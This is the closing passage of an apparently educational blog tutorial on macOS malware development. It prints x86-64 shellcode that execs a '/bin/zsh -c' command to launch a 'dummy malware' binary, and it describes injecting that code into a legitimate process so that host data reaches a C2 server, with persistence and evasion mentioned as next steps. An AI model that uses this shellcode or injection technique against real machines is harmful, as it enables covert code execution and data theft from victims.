    push rax            ; Push "-c" onto stack
    mov rbx, rsp        ; Set rbx to point to "-c"
    push rdx            ; Push NULL onto stack
    jmp short dummy     ; Jump to label dummy

exec:
    push rbx            ; Push "-c" onto stack
    push rdi            ; Push '/bin/zsh' onto stack
    mov rsi, rsp        ; Set RSI to point to stack
    push 59             ; Push syscall number
    pop rax             ; Pop syscall number into rax
    bts rax, 25         ; Set 25th bit of rax (AT_FDCWD flag)
    syscall             ; Invoke syscall

dummy:
    call exec                   ; Call subroutine exec
    db '/Users/foo/dummy_m', 0  ; Define string
    push rdx                    ; Push NULL onto stack

Alright, it’s time to try this beauty. As usual, we’ll need to extract the shellcode and test it before using it. And just like that, bingo! We’ve successfully injected our shellcode, triggering our dummy malware. We’re now receiving host information in the C2 server. We can push this further, even achieve persistence, but I think that’s enough for now.

Executing and sending host information essentially does nothing harmful to your computer. “Dummy” is more about demonstrating how malware can be triggered and how it uses injection techniques to spread. It’s also interesting for defensive evasion or adding backdoor capabilities. This was just a quick look at the Mach API, covering system calls and code injection techniques, and how an attacker can utilize something like process injection to achieve malicious behavior. In this example, we’ve used a legitimate process to inject and execute “malicious code,” potentially exposing host data to an attacker. This can be pushed further, but we’re here just to learn, and I encourage you to experiment with caution. Code injection must be used with care.

All the code used here can be found at Github

Go on, Part II .. macOS Malware Development 0x02

END

In conclusion, I hope you’ve enjoyed and learned from this article. We covered a lot about macOS architecture and APIs, even though we only touched on the basics. By exploring various techniques and writing simple code with the Mach API, we delved into key concepts like code injection, and we saw some macOS syscalls in action. In the next part, we may cover anti-analysis techniques, Persistence, TCC, in-memory execution, and some other tricks as well, Until next time!